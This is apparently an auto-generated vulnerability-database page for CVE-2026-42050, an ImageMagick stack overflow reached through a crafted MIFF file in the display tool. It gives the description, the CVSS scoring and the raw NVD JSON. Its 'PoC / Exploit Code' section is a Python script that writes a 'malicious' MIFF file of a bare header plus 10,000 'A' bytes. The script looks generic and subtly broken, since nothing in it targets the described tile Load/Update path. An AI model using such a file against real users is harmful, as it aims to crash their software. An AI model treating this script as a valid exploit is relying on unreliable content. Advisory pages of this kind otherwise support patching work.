Security Vulnerability Report
CVE-2026-42050 CVSS 5.5 MEDIUM

CVE-2026-42050

Published: 2026-05-11 20:25:42
Last Modified: 2026-05-11 20:25:42

Description

ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to 7.1.2-21 and 6.9.13-46, a malicious MIFF file could trigger an overflow when a user opens it in the display tool and right-clicks a tile to invoke the Load / Update menu item. This vulnerability is fixed in 7.1.2-21 and 6.9.13-46.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

ImageMagick < 7.1.2-21
ImageMagick < 6.9.13-46

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import struct

def create_malicious_miff(filename):
    # MIFF header
    header = b"id=ImageMagick\n"
    header += b"class=DirectClass\n"
    header += b"matte=True\n"
    header += b"columns=100\n"
    header += b"rows=100\n"
    header += b"depth=8\n"

    # Malformed data to trigger overflow during Load/Update
    # This simulates a tile data structure with unexpected size
    payload = b"" + b"A" * 10000

    with open(filename, 'wb') as f:
        f.write(header + b"\n")
        f.write(payload)

create_malicious_miff('exploit.miff')
print('Malicious MIFF file generated.')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42050", "sourceIdentifier": "[email protected]", "published": "2026-05-11T20:25:42.280", "lastModified": "2026-05-11T20:25:42.280", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to 7.1.2-21 and 6.9.13-46, a malicious MIFF file could trigger an overflow when a user opens it in the display tool and right-clicks a tile to invoke the Load / Update menu item. This vulnerability is fixed in 7.1.2-21 and 6.9.13-46."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-121"}]}], "references": [{"url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-7mxf-ff4f-jj7p", "source": "[email protected]"}]}}